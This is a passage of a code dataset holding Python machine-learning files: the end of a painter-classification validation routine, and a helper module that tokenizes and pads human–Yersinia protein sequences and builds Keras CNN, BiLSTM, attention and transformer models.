categorical_crossentropy(y_pred_vec, y_val_vec)\n with tf.Session().as_default():\n cce = cce.eval()\n cce = np.mean(cce)\n\n # Calculate accuracy of single image artist classification.\n # Class prediction is the class with max prob in vector\n # prediction of each painting.\n y_val = np.argmax(y_val, axis=1)\n y_pred = np.argmax(X_val_embedded, axis=1)\n single_painting_acc = accuracy_score(y_val, y_pred)\n\n # Pairwise evaluation: whether they are from the same artist\n batches_val = _create_pairs_generator(\n X_val_embedded, y_val, lambda u, v: [u, v],\n num_groups=32,\n batch_size=1000000)\n\n y_pred, y_true = np.array([]), np.array([])\n for X, y in batches_val:\n y_pred = np.hstack((y_pred, pairs_dot(X)))\n y_true = np.hstack((y_true, y))\n roc_auc = roc_auc_score(y_true, y_pred)\n\n return {\"num_inputs\": num_inputs,\n \"validation_metrics\": {'roc_auc': roc_auc,\n 'categorical_crossentropy': cce,\n 'single_painting_accuracy': single_painting_acc}}\n\ndef make_data_loaders(experiment_config, hparams):\n # multi_crop improves training, but was not used for author's submission\n data_info = load_organized_data_info(IMGS_DIM_3D[1], multi_crop=True)\n dir_tr = data_info['dir_tr']\n dir_val = data_info['dir_val']\n\n gen_tr, gen_val = train_val_dirs_generators(BATCH_SIZE, dir_tr, dir_val)\n\n gen_tr = KerasDataAdapter(gen_tr, workers=16, use_multiprocessing=True)\n gen_val = KerasDataAdapter(gen_val, workers=16, use_multiprocessing=True)\n\n return (gen_tr, gen_val)\n\n\n\n\n", "sub_path": "painters/model_def_standard.py", "file_name": "model_def_standard.py", "file_ext": "py", "file_size_in_byte": 4840, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pedl.frameworks.keras.KerasTrial", "line_number": 19, "usage_type": "name"}, {"api_name": "pedl.get_hyperparameter", "line_number": 23, "usage_type": "call"}, {"api_name": "pedl.get_hyperparameter", "line_number": 24, "usage_type": "call"}, {"api_name": "pedl.get_hyperparameter", "line_number": 25, "usage_type": "call"}, {"api_name": "pedl.get_hyperparameter", "line_number": 26, "usage_type": "call"}, {"api_name": "pedl.get_hyperparameter", "line_number": 27, "usage_type": "call"}, {"api_name": "pedl.get_hyperparameter", "line_number": 28, "usage_type": "call"}, {"api_name": "data_provider.load_organized_data_info", "line_number": 29, "usage_type": "call"}, {"api_name": "validation.IMGS_DIM_1D", "line_number": 29, "usage_type": "argument"}, {"api_name": "train_cnn._cnn", "line_number": 32, "usage_type": "call"}, {"api_name": "keras.optimizers.Adam", "line_number": 35, "usage_type": "call"}, {"api_name": "keras.losses.categorical_crossentropy", "line_number": 39, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 78, "usage_type": "call"}, {"api_name": "tensorflow.convert_to_tensor", "line_number": 85, "usage_type": "call"}, {"api_name": "tensorflow.convert_to_tensor", "line_number": 86, "usage_type": "call"}, {"api_name": "keras.losses.categorical_crossentropy", "line_number": 87, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 96, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 97, "usage_type": "call"}, {"api_name": "validation._create_pairs_generator", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 107, "usage_type": "call"}, {"api_name": "utils.pairs_dot", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 108, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 109, "usage_type": "call"}, {"api_name": "data_provider.load_organized_data_info", "line_number": 118, "usage_type": "call"}, {"api_name": "data_provider.train_val_dirs_generators", "line_number": 122, "usage_type": "call"}, {"api_name": "pedl.frameworks.keras.data.KerasDataAdapter", "line_number": 124, "usage_type": "call"}, {"api_name": "pedl.frameworks.keras.data.KerasDataAdapter", "line_number": 125, "usage_type": "call"}]} +{"seq_id": "271907411", "text": "#Usage\r\n# import sys\r\n# sys.path.insert(0,'path to this file')\r\n# import functions as f\r\n\r\n\r\nimport pickle\r\nimport pandas as pd\r\nimport os\r\nimport sys\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom keras.preprocessing.text import Tokenizer\r\nfrom keras.preprocessing.sequence import pad_sequences\r\nfrom keras.layers import Dense, Input, GlobalMaxPooling1D, Flatten\r\nfrom keras.layers import Conv1D, MaxPooling1D, Embedding, Attention,Concatenate\r\nfrom keras.models import Model\r\nfrom sklearn.metrics import roc_auc_score,roc_curve, auc\r\nfrom numpy import random\r\nfrom keras.layers import LSTM, Bidirectional, GlobalMaxPool1D, Dropout, GlobalAveragePooling1D\r\nfrom keras.optimizers import Adam\r\nfrom keras.utils.vis_utils import plot_model\r\nimport seaborn as sns\r\n\r\ndirectory = '/content/drive/MyDrive/ML_Data/'\r\n\r\n#Use this to create nD format input.\r\n#For eg, to create 4D input, combine_AC(df,4)\r\ndef combine_AC(df,chunksize=3,seperate_chunks=False):\r\n if not seperate_chunks:\r\n df.Human = df.Human.apply(lambda x: [''.join(x)[i:i+chunksize] for i in range(0, len(''.join(x))) if len(''.join(x)[i:i+chunksize])>=chunksize])\r\n df.Yersinia = df.Yersinia.apply(lambda x: [''.join(x)[i:i+chunksize] for i in range(0, len(''.join(x))) if len(''.join(x)[i:i+chunksize])>=chunksize])\r\n try:\r\n df.Joined = [df.loc[row]['Human']+df.loc[row]['Yersinia'] for row in range(df.shape[0])]\r\n except:\r\n df.Joined = df.Joined.apply(lambda x: [''.join(x)[i:i+chunksize] for i in range(0, len(''.join(x))) if len(''.join(x)[i:i+chunksize])>=chunksize])\r\n return df\r\n #print(\"JHGVBJGHGHKHGKG\")\r\n df.Human = df.Human.apply(lambda x: [''.join(x)[i:i+chunksize] for i in range(0, len(''.join(x)), chunksize)])\r\n df.Yersinia = df.Yersinia.apply(lambda x: [''.join(x)[i:i+chunksize] for i in range(0, len(''.join(x)), chunksize)])\r\n df.Joined = [df.loc[row]['Human']+df.loc[row]['Yersinia'] for row in range(df.shape[0])]\r\n return df\r\n\r\ndef shuff_together(df1,df2):\r\n joined = pd.concat([df1,df2], axis=0)\r\n joined = joined.iloc[np.random.permutation(len(joined))].reset_index(drop=True)\r\n return joined.iloc[:df1.shape[0],:],joined.iloc[df1.shape[0]:,:].reset_index(drop=True)\r\ndef load_data(D=1,randomize=False):\r\n try:\r\n with open(directory+'df_train_'+str(D)+'D.pickle', 'rb') as handle:\r\n df_train = pickle.load(handle)\r\n except:\r\n df_train = pd.read_pickle(\"C:/Users/nik00/py/proj/hyppi-train.pkl\")\r\n try:\r\n with open(directory+'df_test_'+str(D)+'D.pickle', 'rb') as handle:\r\n df_test = pickle.load(handle)\r\n except:\r\n df_test = pd.read_pickle(\"C:/Users/nik00/py/proj/hyppi-independent.pkl\")\r\n if randomize:\r\n return shuff_together(df_train,df_test)\r\n else:\r\n return df_train,df_test\r\n\r\n#Creates tokenizers and inputs for doubleip configuration\r\ndef get_seq_data_doubleip(MAX_VOCAB_SIZE, MAX_SEQUENCE_LENGTH,df_train,df_test, pad = 'center',show =False, saveTokrs = False):\r\n print(\"MAX_VOCAB_SIZE is\",MAX_VOCAB_SIZE)\r\n print(\"MAX_SEQUENCE_LENGTH is\",MAX_SEQUENCE_LENGTH)\r\n ip_train_Human = df_train[['Human']]\r\n ip_train_Yersinia = df_train[['Yersinia']]\r\n sentences_train_Human = pd.DataFrame(' '.join(ip_train_Human.loc[i]['Human']) for i in range(ip_train_Human.shape[0])).values.flatten()\r\n sentences_train_Yersinia = pd.DataFrame(' '.join(ip_train_Yersinia.loc[i]['Yersinia']) for i in range(ip_train_Yersinia.shape[0])).values.flatten()\r\n tokenizer1 = Tokenizer(num_words=MAX_VOCAB_SIZE)\r\n tokenizer1.fit_on_texts(sentences_train_Human)\r\n tokenizer2 = Tokenizer(num_words=MAX_VOCAB_SIZE)\r\n tokenizer2.fit_on_texts(sentences_train_Yersinia)\r\n sequences1_train = tokenizer1.texts_to_sequences(sentences_train_Human)\r\n sequences2_train = tokenizer2.texts_to_sequences(sentences_train_Yersinia)\r\n print(\"max sequences1_train length:\", max(len(s) for s in sequences1_train))\r\n print(\"min sequences1_train length:\", min(len(s) for s in sequences1_train))\r\n s = sorted(len(s) for s in sequences1_train)\r\n print(\"median sequences1_train length:\", s[len(s) // 2])\r\n if show : show_stats(sequences1_train,MAX_SEQUENCE_LENGTH,'Human_train') \r\n print(\"max word index sequences1_train:\", max(max(seq) for seq in sequences1_train if len(seq) > 0))\r\n print(\"max sequences2_train length:\", max(len(s) for s in sequences2_train))\r\n print(\"min sequences2_train length:\", min(len(s) for s in sequences2_train))\r\n s = sorted(len(s) for s in sequences2_train)\r\n print(\"median sequences2_train length:\", s[len(s) // 2])\r\n if show : show_stats(sequences2_train,MAX_SEQUENCE_LENGTH,'Yersinia_train')\r\n print(\"max word index sequences2_train:\", max(max(seq) for seq in sequences2_train if len(seq) > 0))\r\n word2idx = tokenizer1.word_index\r\n print('Found %s unique tokens in tokenizer1.' % len(word2idx))\r\n word2idx = tokenizer2.word_index\r\n print('Found %s unique tokens in tokenizer2.' % len(word2idx))\r\n if pad is 'center':\r\n print(\"Center padding\")\r\n data1 = pad_centered(sequences1_train, MAX_SEQUENCE_LENGTH)\r\n data2 = pad_centered(sequences2_train, MAX_SEQUENCE_LENGTH)\r\n else:\r\n print(pad+\" padding\")\r\n data1 = pad_sequences(sequences1_train, MAX_SEQUENCE_LENGTH,padding=pad, truncating=pad)\r\n data2 = pad_sequences(sequences2_train, MAX_SEQUENCE_LENGTH,padding=pad, truncating=pad)\r\n print('Shape of data1 tensor:', data1.shape)\r\n print('Shape of data2 tensor:', data2.shape)\r\n\r\n ip_test_Human = df_test[['Human']]\r\n ip_test_Yersinia = df_test[['Yersinia']]\r\n sentences1_test = pd.DataFrame(' '.join(ip_test_Human.loc[i]['Human']) for i in range(ip_test_Human.shape[0])).values.flatten()\r\n sentences2_test = pd.DataFrame(' '.join(ip_test_Yersinia.loc[i]['Yersinia']) for i in range(ip_test_Yersinia.shape[0])).values.flatten()\r\n test_sequences1 = tokenizer1.texts_to_sequences(sentences1_test)\r\n test_sequences2 = tokenizer2.texts_to_sequences(sentences2_test)\r\n print(\"max test_sequences1 length:\", max(len(s) for s in test_sequences1))\r\n print(\"min test_sequences1 length:\", min(len(s) for s in test_sequences1))\r\n s = sorted(len(s) for s in test_sequences1)\r\n print(\"median test_sequences1 length:\", s[len(s) // 2])\r\n if show : show_stats(test_sequences1,MAX_SEQUENCE_LENGTH,'Human_test')\r\n print(\"max test_sequences2 length:\", max(len(s) for s in test_sequences2))\r\n print(\"min test_sequences2 length:\", min(len(s) for s in test_sequences2))\r\n s = sorted(len(s) for s in test_sequences2)\r\n print(\"median test_sequences2 length:\", s[len(s) // 2])\r\n if show : show_stats(test_sequences2,MAX_SEQUENCE_LENGTH,'Yersinia_test')\r\n if pad is 'center':\r\n print(\"Center padding for test seq.\")\r\n test_data1 = pad_centered(test_sequences1, MAX_SEQUENCE_LENGTH)\r\n test_data2 = pad_centered(test_sequences2, MAX_SEQUENCE_LENGTH)\r\n else:\r\n print(pad+\" padding for test seq.\")\r\n test_data1 = pad_sequences(test_sequences1, MAX_SEQUENCE_LENGTH,padding=pad, truncating=pad)\r\n test_data2 = pad_sequences(test_sequences2, MAX_SEQUENCE_LENGTH,padding=pad, truncating=pad)\r\n print('Shape of test_data1 tensor:', test_data1.shape)\r\n print('Shape of test_data2 tensor:', test_data2.shape)\r\n\r\n num_words = min(MAX_VOCAB_SIZE, len(word2idx) + 1)\r\n print(\"num_words is\",num_words)\r\n if saveTokrs:\r\n save((tokenizer1,tokenizer2),'doubleip_tkrs')\r\n print('Saved tokenizers as doubleip_tkrs')\r\n return data1,data2,test_data1,test_data2,num_words,MAX_SEQUENCE_LENGTH,MAX_VOCAB_SIZE\r\n \r\n \r\n#Creates tokenizers and inputs for join configuration\r\ndef get_seq_data_join(MAX_VOCAB_SIZE, MAX_SEQUENCE_LENGTH,df_train,df_test, pad = 'center',show =False, saveTokrs = False):\r\n print(\"MAX_VOCAB_SIZE is\",MAX_VOCAB_SIZE)\r\n print(\"MAX_SEQUENCE_LENGTH is\",MAX_SEQUENCE_LENGTH)\r\n sentences = pd.DataFrame(' '.join(df_train.loc[i]['Joined']) for i in range(df_train.shape[0])).values.flatten()\r\n tokenizer = Tokenizer(num_words=MAX_VOCAB_SIZE)\r\n tokenizer.fit_on_texts(sentences)\r\n sequences = tokenizer.texts_to_sequences(sentences)\r\n print(\"max sequence_data length:\", max(len(s) for s in sequences))\r\n print(\"min sequence_data length:\", min(len(s) for s in sequences))\r\n s = sorted(len(s) for s in sequences)\r\n print(\"median sequence_data length:\", s[len(s) // 2])\r\n if show : show_stats(sequences,MAX_SEQUENCE_LENGTH,'Joined_train')\r\n print(\"max word index:\", max(max(seq) for seq in sequences if len(seq) > 0))\r\n word2idx = tokenizer.word_index\r\n print('Found %s unique tokens.' % len(word2idx))\r\n \r\n if pad is 'center':\r\n print(\"Center padding.\")\r\n data = pad_centered(sequences, MAX_SEQUENCE_LENGTH)\r\n else:\r\n print(pad+\" padding.\")\r\n data = pad_sequences(sequences, MAX_SEQUENCE_LENGTH,padding=pad, truncating=pad)\r\n print('Shape of data tensor:', data.shape)\r\n sentences_test = pd.DataFrame(' '.join(df_test.loc[i]['Joined']) for i in range(df_test.shape[0])).values.flatten()\r\n sequences_test = tokenizer.texts_to_sequences(sentences_test)\r\n print(\"max sequences_test length:\", max(len(s) for s in sequences_test))\r\n print(\"min sequences_test length:\", min(len(s) for s in sequences_test))\r\n s = sorted(len(s) for s in sequences_test)\r\n print(\"median sequences_test length:\", s[len(s) // 2])\r\n if show : show_stats(sequences_test,MAX_SEQUENCE_LENGTH,'Joined_test') \r\n if pad is 'center':\r\n print(\"Center padding for test seq.\")\r\n data_test = pad_centered(sequences_test, MAX_SEQUENCE_LENGTH)\r\n else:\r\n print(pad+\" padding for test seq.\")\r\n data_test = pad_sequences(sequences_test, MAX_SEQUENCE_LENGTH,padding=pad, truncating=pad)\r\n print('Shape of data_test tensor:', data_test.shape)\r\n num_words = min(MAX_VOCAB_SIZE, len(word2idx) + 1)\r\n print(\"num_words is\",num_words)\r\n if saveTokrs:\r\n save(tokenizer,'join_tkr')\r\n print('Saved tokenizer as join_tkr')\r\n return data,data_test,num_words,MAX_SEQUENCE_LENGTH,MAX_VOCAB_SIZE\r\n\r\ndef test_functions():\r\n print (\"Access to functions.py verified\")\r\n print (\"Access to functions.py verified\")\r\n\r\nimport tensorflow as tf\r\ndef pad_centered(l,max_len):\r\n padded = []\r\n for item in l:\r\n #print(item)\r\n if len(item)<=max_len :\r\n left_zeros = (max_len - len(item))//2\r\n right_zeros = (max_len - len(item))//2 + (max_len - len(item))%2\r\n padded.append([0] * left_zeros + item + [0] * right_zeros)\r\n else:\r\n left_idx = (len(item) - max_len)//2 #- (len(item) - max_len)%2\r\n right_idx = left_idx + max_len\r\n padded.append(item[left_idx:right_idx])\r\n assert(np.array(padded).shape == (len(l),max_len))\r\n return tf.convert_to_tensor(padded)\r\n\r\ndef embedding_layer(num_words,MAX_SEQUENCE_LENGTH,EMBEDDING_DIM):\r\n embedding_matrix = random.uniform(-1, 1,(num_words,EMBEDDING_DIM))\r\n embedding_layer = Embedding(\r\n num_words,\r\n EMBEDDING_DIM,\r\n weights=[embedding_matrix],\r\n input_length=MAX_SEQUENCE_LENGTH,\r\n trainable=True)\r\n return embedding_layer\r\n \r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\ndef show_stats(sequence,MAX_SEQUENCE_LENGTH,title):\r\n lengths = [len(l) for l in sequence]\r\n sss = sorted(lengths)\r\n median = sss[len(sss)//2]\r\n y_pos = np.arange(len(lengths))\r\n plt.bar(y_pos,lengths)\r\n plt.plot([0,len(lengths)], [MAX_SEQUENCE_LENGTH,MAX_SEQUENCE_LENGTH],color='red',linestyle='-',label = \"MAX length cutoff\")\r\n plt.plot([0,len(lengths)], [median,median],color='purple',linestyle='--',label = \"Median = \"+str(median)+\"\")#, ms=558,label = \"Median\")\r\n #plt.figure(figsize=(3, 3))\r\n plt.title(title+\" seq lengths with max length = \"+str(sss[-1])+\"\")\r\n plt.xlabel(\"seq[i]\")\r\n plt.ylabel(\"seq length\")\r\n plt.legend()\r\n plt.show()\r\n \r\ndef conv_model(MAX_SEQUENCE_LENGTH,EMBEDDING_DIM,num_words,DROP=0.2, Flatt = True,filters = 32, kernel_size = 3, MAXpool_size=3):\r\n inputA = Input(shape=(MAX_SEQUENCE_LENGTH,))\r\n x1 = Embedding(num_words, EMBEDDING_DIM, input_length=MAX_SEQUENCE_LENGTH,trainable=True)(inputA)\r\n x1 = Conv1D(filters, kernel_size, activation='relu')(x1)\r\n x1= Dropout(DROP)(x1)\r\n x1 = MaxPooling1D(MAXpool_size)(x1)\r\n if Flatt: x1= Flatten()(x1)\r\n x1 = Dropout(DROP)(x1)\r\n x1 = Dense(128, activation='relu')(x1)\r\n return Model(inputs=inputA, outputs=x1)\r\n \r\ndef BiLSTM_model(MAX_SEQUENCE_LENGTH,EMBEDDING_DIM,num_words,M,DROP=0.2):\r\n ip = Input(shape=(MAX_SEQUENCE_LENGTH,))\r\n x = embedding_layer(num_words,MAX_SEQUENCE_LENGTH,EMBEDDING_DIM)(ip)\r\n #x = Embedding(num_words, EMBEDDING_DIM, input_length=MAX_SEQUENCE_LENGTH,trainable=True)(ip)\r\n x = Bidirectional(LSTM(M, return_sequences=True))(x)\r\n x = Dropout(DROP)(x)\r\n x = Dense(128, activation='relu')(x)\r\n x = GlobalMaxPool1D()(x)\r\n x = Dropout(DROP)(x)\r\n x = Dense(128, activation='relu')(x)\r\n return Model(inputs=ip, outputs=x)\r\n \r\n\r\n# from https://keras.io/api/layers/attention_layers/attention/\r\ndef att_model(MAX_SEQUENCE_LENGTH,EMBEDDING_DIM,num_words,DROP=0.2, BiLSTM = False):\r\n \r\n inputA = Input(shape=(MAX_SEQUENCE_LENGTH,))\r\n query_embeddings = embedding_layer(num_words,MAX_SEQUENCE_LENGTH,EMBEDDING_DIM)(inputA)\r\n \r\n inputB = Input(shape=(MAX_SEQUENCE_LENGTH,))\r\n value_embeddings = embedding_layer(num_words,MAX_SEQUENCE_LENGTH,EMBEDDING_DIM)(inputB)\r\n \r\n \r\n cnn_layer = Conv1D(32, 3)\r\n if BiLSTM: cnn_layer = Bidirectional(LSTM(15, return_sequences=True))\r\n \r\n # Query encoding of shape [batch_size, Tq, filters].\r\n query_seq_encoding = cnn_layer(query_embeddings)\r\n # Value encoding of shape [batch_size, Tv, filters].\r\n value_seq_encoding = cnn_layer(value_embeddings)\r\n \r\n # Query-value attention of shape [batch_size, Tq, filters].\r\n query_value_attention_seq = Attention()(\r\n [query_seq_encoding, value_seq_encoding])\r\n \r\n query_value_attention_seq = Dropout(DROP)(query_value_attention_seq)\r\n query_value_attention_seq = Dense(128, activation='relu')(query_value_attention_seq)\r\n \r\n query_seq_encoding = Dropout(DROP)(query_seq_encoding)\r\n query_seq_encoding = Dense(128, activation='relu')(query_seq_encoding)\r\n \r\n # Reduce over the sequence axis to produce encodings of shape\r\n # [batch_size, filters].\r\n query_encoding = GlobalAveragePooling1D()(\r\n query_seq_encoding)\r\n query_value_attention = GlobalAveragePooling1D()(\r\n query_value_attention_seq)\r\n \r\n query_encoding = Dropout(DROP)(query_encoding)\r\n query_encoding = Dense(128, activation='relu')(query_encoding)\r\n \r\n query_value_attention = Dropout(DROP)(query_value_attention)\r\n query_value_attention = Dense(128, activation='relu')(query_value_attention)\r\n \r\n \r\n # Concatenate query and document encodings to produce a DNN input layer.\r\n input_layer = Concatenate()([query_encoding, query_value_attention])\r\n\r\n return Model(inputs=[inputA, inputB], outputs=input_layer) \r\n # x = Dense(128, activation='relu')(input_layer)\r\n # x = Dropout(DROP)(x)\r\n # output = Dense(1, activation=\"sigmoid\",name=\"Final\")(x)\r\n # return Model(inputs=[inputA, inputB], outputs=output)\r\n\r\n\r\n# from https://keras.io/examples/nlp/text_classification_with_transformer/\r\nfrom tensorflow import keras\r\nfrom tensorflow.keras import layers\r\nclass TransformerBlock(layers.Layer):\r\n def __init__(self, embed_dim, num_heads, ff_dim, rate=0.1):\r\n super(TransformerBlock, self).__init__()\r\n self.att = layers.MultiHeadAttention(num_heads=num_heads, key_dim=embed_dim)\r\n self.ffn = keras.Sequential(\r\n [layers.Dense(ff_dim, activation=\"relu\"), layers.Dense(embed_dim),]\r\n )\r\n self.layernorm1 = layers.LayerNormalization(epsilon=1e-6)\r\n self.layernorm2 = layers.LayerNormalization(epsilon=1e-6)\r\n self.dropout1 = layers.Dropout(rate)\r\n self.dropout2 = layers.Dropout(rate)\r\n\r\n def call(self, inputs, training):\r\n attn_output = self.att(inputs, inputs)\r\n attn_output = self.dropout1(attn_output, training=training)\r\n out1 = self.layernorm1(inputs + attn_output)\r\n ffn_output = self.ffn(out1)\r\n ffn_output = self.dropout2(ffn_output, training=training)\r\n return self.layernorm2(out1 + ffn_output)\r\n\r\n\r\nclass TokenAndPositionEmbedding(layers.Layer):\r\n def __init__(self, maxlen, vocab_size, embed_dim):\r\n super(TokenAndPositionEmbedding, self).__init__()\r\n self.token_emb = layers.Embedding(input_dim=vocab_size, output_dim=embed_dim)\r\n self.pos_emb = layers.Embedding(input_dim=maxlen, output_dim=embed_dim)\r\n\r\n def call(self, x):\r\n maxlen = tf.shape(x)[-1]\r\n positions = tf.range(start=0, limit=maxlen, delta=1)\r\n positions = self.pos_emb(positions)\r\n x = self.token_emb(x)\r\n return x + positions\r\n\r\ndef transf_model(MAX_SEQUENCE_LENGTH,num_words, EMBEDDING_DIM, DROP = 0.3, num_heads = 2, ff_dim = 64):\r\n inputs=Input((MAX_SEQUENCE_LENGTH,))\r\n embedding_layer = TokenAndPositionEmbedding(MAX_SEQUENCE_LENGTH, num_words, EMBEDDING_DIM)\r\n x = embedding_layer(inputs)\r\n transformer_block = TransformerBlock(EMBEDDING_DIM, num_heads, ff_dim)\r\n x = transformer_block(x)\r\n x = Dropout(DROP)(x)\r\n x = Dense(256, activation=\"relu\")(x)\r\n x = GlobalAveragePooling1D()(x)\r\n return Model(inputs,x)\r\n # ip = transf_model(MAX_SEQUENCE_LENGTH_,num_words_5D_join,5)\r\n # x = Dropout(DROP)(ip.output)\r\n # x = Dense(128, activation=\"relu\")(x)\r\n # x = Dropout(DROP)(x)\r\n # outputs = Dense(1, activation=\"sigmoid\")(x)\r\n # model1D_CNN_join=Model(ip.input,outputs)\r\n \r\n\r\ndef save(data,name):\r\n with open(directory+''+name+'.pickle', 'wb') as handle:\r\n pickle.dump(data, handle, protocol=pickle.HIGHEST_PROTOCOL)\r\n\r\ndef load(name):\r\n with open(directory+''+name+'.pickle', 'rb') as handle:\r\n return pickle.load(handle)\r\n \r\n#Creates and saves Tokenizers for combine config\r\ndef create_tokenizers(df_train):\r\n ip_train_Human = df_train[['Human']]\r\n ip_train_Yersinia = df_train[['Yersinia']]\r\n sentences_train_Human = pd.DataFrame(' '.join(ip_train_Human.loc[i]['Human']) for i in range(ip_train_Human.shape[0])).values.flatten()\r\n sentences_train_Yersinia = pd.DataFrame(' '.join(ip_train_Yersinia.loc[i]['Yersinia']) for i in range(ip_train_Yersinia.shape[0])).values.flatten()\r\n tokenizer1 = Tokenizer(num_words=500000)\r\n tokenizer1.fit_on_texts(sentences_train_Human)\r\n tokenizer2 = Tokenizer(num_words=500000)\r\n tokenizer2.fit_on_texts(sentences_train_Yersinia)\r\n save((tokenizer1,tokenizer2),'doubleip_tkrs')\r\n print('Saved tokenizers as doubleip_tkrs')\r\n sentences = pd.DataFrame(' '.join(df_train.loc[i]['Joined']) for i in range(df_train.shape[0])).values.flatten()\r\n tokenizer = Tokenizer(num_words=1000000)\r\n tokenizer.fit_on_texts(sentences)\r\n save(tokenizer,'join_tkr')\r\n print('Saved tokenizer as join_tkr')\r\n \r\n\r\n#Meant for final model\r\ndef preprocess(df_test, show =False, saveTokrs = True):\r\n D = len(df_test[['Human']].iloc[0][0][0])\r\n if D==1:\r\n print(\"Converting to 5D. This will take a few minutes\")\r\n combine_AC(df_test,5)\r\n elif D!=5:\r\n print(\"Data should be in 1D format\")\r\n sys.exit()\r\n else: pass\r\n \r\n if saveTokrs:\r\n if input(\"Create tokenizers? Enter y if this is new training data. y/n: \") is 'y': create_tokenizers(df_test)\r\n \r\n inputs = []\r\n MAX_SEQUENCE_LENGTH = 2000 #for joined\r\n print('Preprocessing...')\r\n #print(\"Seq length for joined is\",MAX_SEQUENCE_LENGTH)\r\n tokenizer = load('join_tkr')\r\n sentences_test_J = pd.DataFrame(' '.join(df_test.loc[i]['Joined']) for i in range(df_test.shape[0])).values.flatten()\r\n sequences_test = tokenizer.texts_to_sequences(sentences_test_J)\r\n s = sorted(len(s) for s in sequences_test)\r\n if show : show_stats(sequences_test,MAX_SEQUENCE_LENGTH,'Joined_seq')\r\n data_test = pad_sequences(sequences_test, MAX_SEQUENCE_LENGTH,padding='pre', truncating='pre')\r\n inputs.append(data_test)\r\n sequences_test = tokenizer.texts_to_sequences(sentences_test_J)\r\n data_test = pad_centered(sequences_test, MAX_SEQUENCE_LENGTH)\r\n inputs.append(data_test)\r\n sequences_test = tokenizer.texts_to_sequences(sentences_test_J)\r\n data_test = pad_sequences(sequences_test, MAX_SEQUENCE_LENGTH,padding='post', truncating='post')\r\n inputs.append(data_test)\r\n MAX_SEQUENCE_LENGTH = 1000 #for doubleip\r\n #print(\"Seq length for doubleip is\",MAX_SEQUENCE_LENGTH)\r\n ip_test_Human = df_test[['Human']]\r\n ip_test_Yersinia = df_test[['Yersinia']]\r\n sentences1_test = pd.DataFrame(' '.join(ip_test_Human.loc[i]['Human']) for i in range(ip_test_Human.shape[0])).values.flatten()\r\n sentences2_test = pd.DataFrame(' '.join(ip_test_Yersinia.loc[i]['Yersinia']) for i in range(ip_test_Yersinia.shape[0])).values.flatten()\r\n tokenizer1,tokenizer2 = load('doubleip_tkrs')\r\n test_sequences1 = tokenizer1.texts_to_sequences(sentences1_test)\r\n test_sequences2 = tokenizer2.texts_to_sequences(sentences2_test)\r\n if show : show_stats(test_sequences1,MAX_SEQUENCE_LENGTH,'doubleip seq')\r\n test_data1 = pad_sequences(test_sequences1, MAX_SEQUENCE_LENGTH,padding='pre', truncating='pre')\r\n inputs.append(test_data1)\r\n test_data2 = pad_sequences(test_sequences2, MAX_SEQUENCE_LENGTH,padding='pre', truncating='pre')\r\n inputs.append(test_data2)\r\n test_sequences1 = tokenizer1.texts_to_sequences(sentences1_test)\r\n test_sequences2 = tokenizer2.texts_to_sequences(sentences2_test)\r\n test_data1 = pad_centered(test_sequences1, MAX_SEQUENCE_LENGTH)\r\n inputs.append(test_data1)\r\n test_data2 = pad_centered(test_sequences2, MAX_SEQUENCE_LENGTH)\r\n inputs.append(test_data2)\r\n test_sequences1 = tokenizer1.texts_to_sequences(sentences1_test)\r\n test_sequences2 = tokenizer2.texts_to_sequences(sentences2_test)\r\n test_data1 = pad_sequences(test_sequences1, MAX_SEQUENCE_LENGTH,padding='post', truncating='post')\r\n inputs.append(test_data1)\r\n test_data2 = pad_sequences(test_sequences2, MAX_SEQUENCE_LENGTH,padding='post', truncating='post')\r\n inputs.append(test_data2)\r\n return inputs\r\n\r\n\r\n\r\n\r\n", "sub_path": "functions.py", "file_name": "functions.py", "file_ext": "py", "file_size_in_byte": 22210, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pandas.concat", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.random.permutation", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 52, "usage_type": "call"}, {"api_name": "pandas.read_pickle", "line_number": 54, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 57, "usage_type": "call"}, {"api_name": "pandas.read_pickle", "line_number": 59, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 71, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 72, "usage_type": "call"}, {"api_name": "keras.preprocessing.text.Tokenizer", "line_number": 73, "usage_type": "call"}, {"api_name": "keras.preprocessing.text.Tokenizer", "line_number": 75, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 101, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 102, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 108, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 109, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 128, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 129, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 145, "usage_type": "call"}, {"api_name": "keras.preprocessing.text.Tokenizer", "line_number": 146, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 163, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 165, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 177, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 203, "usage_type": "call"}, {"api_name": "tensorflow.convert_to_tensor", "line_number": 204, "usage_type": "call"}, {"api_name": 